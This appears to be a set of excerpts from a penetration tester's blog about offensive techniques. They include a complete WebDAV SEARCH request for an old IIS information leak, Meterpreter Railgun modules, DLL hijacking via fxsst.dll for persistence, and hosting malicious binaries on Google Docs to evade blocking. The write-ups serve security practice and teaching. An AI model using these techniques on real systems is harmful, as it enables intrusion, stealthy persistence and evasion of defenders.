This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful: Send this: SEARCH / HTTP/1.1 Host: target Content-Type: text/xml Content-Length: 133 <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> And expect something like this back:
Update 1: No this doesn’t need to be in memory since you control the system but it was a fun challenge Update 2: The info from the ‘adduser’ payload says ‘Create a new user and add them to local administration group’ - I’m guessing since I ran this on a DC is why I didn’t notice this but it is something to keep in mind when running this script. Update 3: Here is a powershell way of doing things from a CSV, you can do some passwords in the CSV and keep it for reference too.
I saw a post back in June and it just recently came up again: http://www.securityartwork.es/2011/06/01/dns-port-forwarding-con-meterpreter/ It looked like a lot of hard work to set that up and I’m really lazy. I didn’t want to have to go through all that every time I got onto a new network. So, I made a very simple meterpreter post module to just call a Windows API key called ‘gethostbyaddr’ using Railgun. TL:DR; You can download the post module here: ipresolver.
One important thing to note about Railgun is that you are querying the API and just as if you were using C++ the API you are calling just might not be there on the system you are trying to call it on. So here is a quick trick to find out if a the function (API) that you are trying to call is available to you: For my example I’m using ‘getaddrinfo’ since it’s life in Windows is somewhat odd.
Also known as “How to practice what we preach”. I don’t know how long I’ve been telling clients that they need to have a minimum password length of 15 characters to make it so there is no chance LM will be stored (and a cursory bonus that their password won’t be close to their original). But I’ve never tried setting it myself. Well, a client called me out. You can’t! (well at least not through the UI )
This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (more info). Definitely not complaining though as the new features *(as will be discussed in part 2) are some epic new additions to the payloads list. However an important change happened while the craziness over the new payloads was going on. ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm). Here is the link to the ticket about the change (link) and the revision (r13057)
I’ve been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my Go-to for allowing me to visualize the process and do some basic sorting (really wish I could search in-app). But I’ve been asking around on twitter some questions like Why is GPU cracking for 50k hashes faster than Rainbow Tables (most say the bottleneck is the HDD read style and speed) and many asked what all of my compalints are so I figured this would be the best place (vice multiple emails)
I missed the 3 year anniversary of NoVA Hackers but I did want to make a post about it since we are still going strong and are now at ~150 active members. Chris Gates and I started this thing together back in October of 2008 which spawned off of Chris’ idea to start a AHA (Austin Hackers Association)-like group in NoVA. It’s ideals merged with the already going NoVA Security Luncheons that I was throwing in Reston VA and DC was where it all started.
Nick Harbour wrote a post on Mandiants blog about some Malware that was using a dll called ‘fxsst.dll’ to hide and stay persistent on a system. The DLL is used by Windows when it is acting as a Fax server (anyone still do that?). He mentions some very interesting points: The DLL gets loaded at login by Explorer The DLL exists in System32 but is looked for in Windows first Explorer doesn’t try to use anything inside of it via exports unless the system is acting as a fax server (aka safe to put a pretty bland DLL there) I thought… no it couldn’t be that simple… lets see:
In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’. One of the down sides of that payload is you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple months ago) allowed people to upload ‘anything’ to Google docs. And you can then share these files publicly. Probably already see where I’m going with this, but here are some steps to get it going, first upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute).